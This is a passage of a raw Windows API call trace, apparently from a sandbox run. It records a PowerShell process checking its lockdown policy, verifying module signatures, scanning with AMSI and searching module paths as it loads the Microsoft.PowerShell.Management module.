nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0160.876] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0160.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86de15c) returned 1 [0160.876] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x86de1d8 | out: lpFileInformation=0x86de1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0160.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86de158) returned 1 [0160.876] GetSystemInfo (in: lpSystemInfo=0x86de20c | out: lpSystemInfo=0x86de20c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0160.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de19c | out: phkResult=0x86de19c*=0x7b4) returned 0x0 [0160.877] RegQueryValueExW (in: hKey=0x7b4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x86de1b8, lpData=0x0, lpcbData=0x86de1b4*=0x0 | out: lpType=0x86de1b8*=0x0, lpData=0x0, lpcbData=0x86de1b4*=0x0) returned 0x2 [0160.877] RegCloseKey (hKey=0x7b4) returned 0x0 [0160.878] CloseHandle (hObject=0x6f8) returned 1 [0160.910] CoCreateGuid (in: pguid=0x86de28c | out: pguid=0x86de28c*(Data1=0x5abe7fc, Data2=0x658d, Data3=0x44c5, Data4=([0]=0xb2, [1]=0x2c, [2]=0xaf, [3]=0xf7, [4]=0x3, [5]=0x92, [6]=0xa, [7]=0x72))) returned 0x0 [0160.916] QueryPerformanceCounter (in: lpPerformanceCount=0x86ddfec | out: lpPerformanceCount=0x86ddfec*=25667127076) returned 1 [0160.916] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.916] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86ddf20) returned 1 [0160.916] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86ddf9c | out: lpFileInformation=0x86ddf9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fef3047, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fef3047, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fef3047, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ea)) returned 1 [0160.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86ddf1c) returned 1 [0160.916] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.916] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.916] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.916] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dde94) returned 1 [0160.916] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86ddf10 | out: lpFileInformation=0x86ddf10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fef3047, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fef3047, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fef3047, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ea)) returned 1 [0160.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dde90) returned 1 [0160.917] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.917] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dde68) returned 1 [0160.917] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6f8 [0160.917] GetFileType (hFile=0x6f8) returned 0x1 [0160.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dde64) returned 1 [0160.917] GetFileType (hFile=0x6f8) returned 0x1 [0160.917] WTGetSignatureInfo () returned 0x0 [0161.170] CertDuplicateCertificateContext (pCertContext=0x75e0388) returned 0x75e0388 [0161.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x86ddecc | out: phkResult=0x86ddecc*=0x7c4) returned 0x0 [0161.171] RegQueryValueExW (in: hKey=0x7c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86ddeec, lpData=0x0, lpcbData=0x86ddee8*=0x0 | out: lpType=0x86ddeec*=0x1, lpData=0x0, lpcbData=0x86ddee8*=0x56) returned 0x0 [0161.171] RegQueryValueExW (in: hKey=0x7c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86ddeec, lpData=0x53e6d74, lpcbData=0x86ddee8*=0x56 | out: lpType=0x86ddeec*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x86ddee8*=0x56) returned 0x0 [0161.171] RegCloseKey (hKey=0x7c4) returned 0x0 [0161.171] CoTaskMemAlloc (cb=0x10) returned 0x7655400 [0161.171] CoTaskMemAlloc (cb=0x30) returned 0x760b448 [0161.172] WinVerifyTrust () returned 0x0 [0161.176] CoTaskMemFree (pv=0x760b448) [0161.176] CoTaskMemFree (pv=0x7655400) [0161.176] CertFreeCertificateContext (pCertContext=0x75e0388) returned 1 [0161.176] CloseHandle (hObject=0x6f8) returned 1 [0161.176] AmsiOpenSession () returned 0x0 [0161.176] AmsiScanString () returned 0x80070015 [0161.264] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff [0161.264] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff [0161.344] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0161.345] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0161.345] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0161.345] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0161.449] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x67 [0161.450] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x67, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x66 [0161.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dd920) returned 1 [0161.450] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x86dd99c | out: lpFileInformation=0x86dd99c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dd91c) returned 1 [0161.451] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0161.451] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0161.454] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x86dd658, nSize=0xc3 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0161.455] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0161.456] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0161.456] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x54, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53 [0161.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dd728) returned 1 [0161.456] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x86dd7a4 | out: lpFileInformation=0x86dd7a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dd724) returned 1 [0161.459] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0161.461] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\modules")) returned 0xffffffff [0161.470] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0161.471] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0161.471] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x5a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x59 [0161.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dd728) returned 1 [0161.471] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x86dd7a4 | out: lpFileInformation=0x86dd7a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dd724) returned 1 [0161.473] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0161.485] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0161.486] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0161.486] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x5c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x5b [0161.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dd728) returned 1 [0161.486] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x86dd7a4 | out: lpFileInformation=0x86dd7a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dd724) returned 1 [0161.489] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0161.998] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xa0 [0161.998] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0xa0, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0161.998] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xa0 [0161.998] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0xa0, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0161.998] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xa0 [0161.999] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0xa0, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0162.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de5ec | out: phkResult=0x86de5ec*=0x7bc) returned 0x0 [0162.756] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x0, lpcbData=0x86de608*=0x0 | out: lpType=0x86de60c*=0x1, lpData=0x0, lpcbData=0x86de608*=0x56) returned 0x0 [0162.756] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x53db370, lpcbData=0x86de608*=0x56 | out: lpType=0x86de60c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x86de608*=0x56) returned 0x0 [0162.756] RegCloseKey (hKey=0x7bc) returned 0x0 [0162.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de5ec | out: phkResult=0x86de5ec*=0x7bc) returned 0x0 [0162.757] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x0, lpcbData=0x86de608*=0x0 | out: lpType=0x86de60c*=0x1, lpData=0x0, lpcbData=0x86de608*=0x56) returned 0x0 [0162.757] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x53db684, lpcbData=0x86de608*=0x56 | out: lpType=0x86de60c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x86de608*=0x56) returned 0x0 [0162.757] RegCloseKey (hKey=0x7bc) returned 0x0 [0162.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de5ec | out: phkResult=0x86de5ec*=0x7bc) returned 0x0 [0162.759] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x0, lpcbData=0x86de608*=0x0 | out: lpType=0x86de60c*=0x1, lpData=0x0, lpcbData=0x86de608*=0x56) returned 0x0 [0162.759] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x53db98c, lpcbData=0x86de608*=0x56 | out: lpType=0x86de60c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x86de608*=0x56) returned 0x0 [0162.759] RegCloseKey (hKey=0x7bc) returned 0x0 [0162.759] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de5ec | out: phkResult=0x86de5ec*=0x7bc) returned 0x0 [0162.760] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x0, lpcbData=0x86de608*=0x0 | out: lpType=0x86de60c*=0x1, lpData=0x0, lpcbData=0x86de608*=0x56) returned 0x0 [0162.760] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de60c, lpData=0x53dbca0, lpcbData=0x86de608*=0x56 | out: lpType=0x86de60c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x86de608*=0x56) returned 0x0 [0162.760] RegCloseKey (hKey=0x7bc) returned 0x0 [0162.761] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de638 | out: phkResult=0x86de638*=0x7bc) returned 0x0 [0162.762] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de658, lpData=0x0, lpcbData=0x86de654*=0x0 | out: lpType=0x86de658*=0x1, lpData=0x0, lpcbData=0x86de654*=0x56) returned 0x0 [0162.762] RegQueryValueExW (in: hKey=0x7bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x86de658, lpData=0x53dbfe8, lpcbData=0x86de654*=0x56 | out: lpType=0x86de658*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x86de654*=0x56) returned 0x0 [0162.762] RegCloseKey (hKey=0x7bc) returned 0x0 [0162.773] CoTaskMemAlloc (cb=0x20c) returned 0x12ba7f0 [0162.773] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x12ba7f0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0162.773] CoTaskMemFree (pv=0x12ba7f0) [0162.773] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, 